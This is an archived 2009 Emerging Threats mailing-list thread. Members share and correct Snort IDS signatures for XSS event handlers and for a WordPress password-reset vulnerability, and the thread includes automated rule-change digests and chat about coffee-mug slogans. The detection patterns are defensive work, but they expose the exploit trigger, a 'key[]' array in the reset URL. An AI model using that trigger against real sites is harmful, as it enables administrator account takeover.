qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From kevross33 at googlemail.com Tue Aug 11 08:32:00 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Tue, 11 Aug 2009 13:32:00 +0100 Subject: [Emerging-Sigs] some sigs Message-ID: some cross site scripting sigs (including a replacement for my onmouseover sig so it covers more XSS methods and also a wordpress vulnerability sig. All tested and working and I doubt there will be FPs or poor performance with these. Any thoughts, comments or issues with them? alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onmouse Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onmouse"; nocase; pcre:"/(over|up|down|out|move)/Ui"; classtype:web-application-attack; reference:url,www.w3schools.com/jsref/jsref_onmouseover.asp; reference:url, www.w3schools.com/jsref/jsref_onmouseup.asp; reference:url, www.w3schools.com/jsref/jsref_onmousedown.asp; reference:url, www.w3schools.com/jsref/jsref_onmouseout.asp; reference:url, www.w3schools.com/jsref/jsref_onmousemove.asp; sid:1900001; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onkey Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onkey"; nocase; pcre:"/(down|press|up)/Ui"; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onkeydown.asp; reference:url, www.w3schools.com/jsref/jsref_onkeypress.asp; reference:url, www.w3schools.com/jsref/jsref_onkeyup.asp; sid:1900002; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onclick Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onclick"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onClick.asp; sid:1900003; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onchange Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onchange"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onchange.asp; sid:1900003; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onfocus Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onfocus"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onfocus.asp; sid:1900004; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onblur Event in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onblur"; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onblur.asp; sid:1900005; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possibly Wordpress Administrative Password Reset Vulnerability"; flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; nocase; classtype:web-application-attack; reference:url, www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;) Kevin -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090811/c1bf2d4b/attachment.html From kevross33 at googlemail.com Tue Aug 11 08:32:54 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Tue, 11 Aug 2009 13:32:54 +0100 Subject: [Emerging-Sigs] some sigs In-Reply-To: References: Message-ID: Spelling Correction: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; nocase; classtype:web-application-attack; reference:url, www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;) 2009/8/11 Kevin Ross > some cross site scripting sigs (including a replacement for my onmouseover > sig so it covers more XSS methods and also a wordpress vulnerability sig. > All tested and working and I doubt there will be FPs or poor performance > with these. Any thoughts, comments or issues with them? > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB > Onmouse Event in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onmouse"; nocase; > pcre:"/(over|up|down|out|move)/Ui"; classtype:web-application-attack; > reference:url,www.w3schools.com/jsref/jsref_onmouseover.asp; > reference:url,www.w3schools.com/jsref/jsref_onmouseup.asp; reference:url, > www.w3schools.com/jsref/jsref_onmousedown.asp; reference:url, > www.w3schools.com/jsref/jsref_onmouseout.asp; reference:url, > www.w3schools.com/jsref/jsref_onmousemove.asp; sid:1900001; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Onkey > Event in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onkey"; nocase; > pcre:"/(down|press|up)/Ui"; classtype:web-application-attack; reference:url, > www.w3schools.com/jsref/jsref_onkeydown.asp; reference:url, > www.w3schools.com/jsref/jsref_onkeypress.asp; reference:url, > www.w3schools.com/jsref/jsref_onkeyup.asp; sid:1900002; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB > Onclick Event in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onclick"; nocase; > classtype:web-application-attack; reference:url, > www.w3schools.com/jsref/jsref_onClick.asp; sid:1900003; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB > Onchange Event in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onchange"; nocase; > classtype:web-application-attack; reference:url, > www.w3schools.com/jsref/jsref_onchange.asp; sid:1900003; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB > Onfocus Event in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onfocus"; nocase; > classtype:web-application-attack; reference:url, > www.w3schools.com/jsref/jsref_onfocus.asp; sid:1900004; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB > Onblur Event in URI - Likely Cross Site Scripting Attempt"; > flow:to_server,established; uricontent:"onblur"; nocase; > classtype:web-application-attack; reference:url, > www.w3schools.com/jsref/jsref_onblur.asp; sid:1900005; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possibly > Wordpress Administrative Password Reset Vulnerability"; > flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; > nocase; classtype:web-application-attack; reference:url, > www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;) > > Kevin > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090811/b0109616/attachment.html From bojan.isc at gmail.com Tue Aug 11 09:23:20 2009 From: bojan.isc at gmail.com (Bojan Zdrnja (SANS ISC)) Date: Tue, 11 Aug 2009 15:23:20 +0200 Subject: [Emerging-Sigs] some sigs In-Reply-To: References: Message-ID: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross wrote: > Spelling Correction: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible > Wordpress Administrative Password Reset Vulnerability"; > flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; > nocase; classtype:web-application-attack; > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; > sid:1900006; rev:1;) If I'm not wrong, this will alert on legitimate password resets. You want to catch it when key is an array (since that will pass the check in Wordpress' PHP code. So, I think this rule would be correct: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; flow:to_server,established; uricontent:"/wp-login.php?action=rp&key[]="; nocase; classtype:web-application-attack; reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; sid:1900006; rev:1;) Cheers, Bojan From jonkman at jonkmans.com Tue Aug 11 09:27:04 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 11 Aug 2009 09:27:04 -0400 Subject: [Emerging-Sigs] some sigs In-Reply-To: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> References: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> Message-ID: <4A8171A8.3010803@jonkmans.com> Posted this way. Thanks. By the way, you both get a sig credit in the contest. One for writing and one for a significant modification. Matt Bojan Zdrnja (SANS ISC) wrote: > On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross wrote: >> Spelling Correction: >> >> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible >> Wordpress Administrative Password Reset Vulnerability"; >> flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; >> nocase; classtype:web-application-attack; >> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; >> sid:1900006; rev:1;) > > If I'm not wrong, this will alert on legitimate password resets. You > want to catch it when key is an array (since that will pass the check > in Wordpress' PHP code. So, I think this rule would be correct: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS > (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; > flow:to_server,established; > uricontent:"/wp-login.php?action=rp&key[]="; nocase; > classtype:web-application-attack; > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; > sid:1900006; rev:1;) > > > Cheers, > > Bojan > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Tue Aug 11 09:41:13 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 11 Aug 2009 09:41:13 -0400 Subject: [Emerging-Sigs] Coffee Mug Slogans Message-ID: <4A8174F9.4020009@jonkmans.com> I'm very surprised at the closeness of the vote on the slogans. content:"|C0 FF EE|"; has 251, while pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig"; has 248 as of this morning. So I'll leave the voting open another day or so and see if we can get a better separation. You can vote at the main page, http://www.emergingthreats.net Thanks all! Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From eoin.miller at trojanedbinaries.com Tue Aug 11 09:52:44 2009 From: eoin.miller at trojanedbinaries.com (Eoin Miller) Date: Tue, 11 Aug 2009 09:52:44 -0400 Subject: [Emerging-Sigs] Coffee Mug Slogans In-Reply-To: <4A8174F9.4020009@jonkmans.com> References: <4A8174F9.4020009@jonkmans.com> Message-ID: <4A8177AC.6080004@trojanedbinaries.com> Matt Jonkman wrote: > I'm very surprised at the closeness of the vote on the slogans. > > > content:"|C0 FF EE|"; has 251, while > > pcre:"/C0ffE{2}\s+Ma\x6Bes\s+Me\s[^S]*Regul4r/ig"; > > has 248 as of this morning. So I'll leave the voting open another day or > so and see if we can get a better separation. > > You can vote at the main page, http://www.emergingthreats.net > > Thanks all! > > Matt > > Mugs have two sides (and these are two pretty good ideas). -- Eoin From jonkman at jonkmans.com Tue Aug 11 09:57:00 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 11 Aug 2009 09:57:00 -0400 Subject: [Emerging-Sigs] Coffee Mug Slogans In-Reply-To: <4A8177AC.6080004@trojanedbinaries.com> References: <4A8174F9.4020009@jonkmans.com> <4A8177AC.6080004@trojanedbinaries.com> Message-ID: <4A8178AC.8070404@jonkmans.com> Eoin Miller wrote: > Mugs have two sides (and these are two pretty good ideas). Yes, but unfortunately printing on both sides is expensive, and requires two setup and design fees for the printers. It'd really jack the price of the mugs up. And we're printing in at least two colors (three on anything but white...) We'd end up with 35 dollar mugs if we aren't careful. It's a possibility though if nobody minds paying a bit more. I can look into the pricing to do both. Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From wkitty42 at windstream.net Tue Aug 11 10:40:14 2009 From: wkitty42 at windstream.net (waldo kitty) Date: Tue, 11 Aug 2009 10:40:14 -0400 Subject: [Emerging-Sigs] Coffee Mug Slogans In-Reply-To: <4A8177AC.6080004@trojanedbinaries.com> References: <4A8174F9.4020009@jonkmans.com> <4A8177AC.6080004@trojanedbinaries.com> Message-ID: <4A8182CE.9020705@windstream.net> Eoin Miller wrote: > Matt Jonkman wrote: >> I'm very surprised at the closeness of the vote on the slogans. [trim] >> > Mugs have two sides (and these are two pretty good ideas). inside and outside? ;) :P From kevross33 at googlemail.com Tue Aug 11 11:12:39 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Tue, 11 Aug 2009 16:12:39 +0100 Subject: [Emerging-Sigs] some sigs In-Reply-To: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> References: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> Message-ID: Ah yes I missed that, if you look at the reference for securitytracker the example has [] in it too. Thanks for pointing this out. 2009/8/11 Bojan Zdrnja (SANS ISC) > On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross > wrote: > > Spelling Correction: > > > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible > > Wordpress Administrative Password Reset Vulnerability"; > > flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; > > nocase; classtype:web-application-attack; > > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; > > sid:1900006; rev:1;) > > If I'm not wrong, this will alert on legitimate password resets. You > want to catch it when key is an array (since that will pass the check > in Wordpress' PHP code. So, I think this rule would be correct: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS > (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; > flow:to_server,established; > uricontent:"/wp-login.php?action=rp&key[]="; nocase; > classtype:web-application-attack; > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; > sid:1900006; rev:1;) > > > Cheers, > > Bojan > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090811/504c92bd/attachment.html From n.gausepohl at insightbb.com Tue Aug 11 11:25:17 2009 From: n.gausepohl at insightbb.com (nicholas gausepohl) Date: Tue, 11 Aug 2009 11:25:17 -0400 Subject: [Emerging-Sigs] check for user names Message-ID: http://namechk.com/ -- Using Opera's revolutionary e-mail client: http://www.opera.com/mail/ From emerging at emergingthreats.net Tue Aug 11 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 11 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090811200012.7D8A24504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Aug 11 16:00:12 2009 [***] [+++] Added rules: [+++] 2002801 - ET POLICY Google Desktop User-Agent Detected (emerging-policy.rules) 2002838 - ET POLICY Google Search Appliance browsing the Internet (emerging-policy.rules) 2002849 - ET POLICY Google Appliance External Proxy Stylesheet (emerging-policy.rules) 2009748 - ET WEB Possible Wordpress Administrative Password Reset Vulnerability (emerging-web.rules) 2009749 - ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan (emerging-scan.rules) [---] Removed rules: [---] 2002801 - ET WEB_SPECIFIC Google Desktop User-Agent Detected (emerging-web_sql_injection.rules) 2002838 - ET WEB_SPECIFIC Google Search Appliance browsing the Internet (emerging-web_sql_injection.rules) 2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-policy.rules (3): # Submitted by Michael Holstein, 2006-02-13. Reference from scheidell # Submitted 2006-02-28 by Mark Warren. For Google appliances that "should" only spider internal web sites (but sometimes go wild and spider the Internet) #by Blake Hartstein of Demarc -> Added to emerging-sid-msg.map (57): 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || 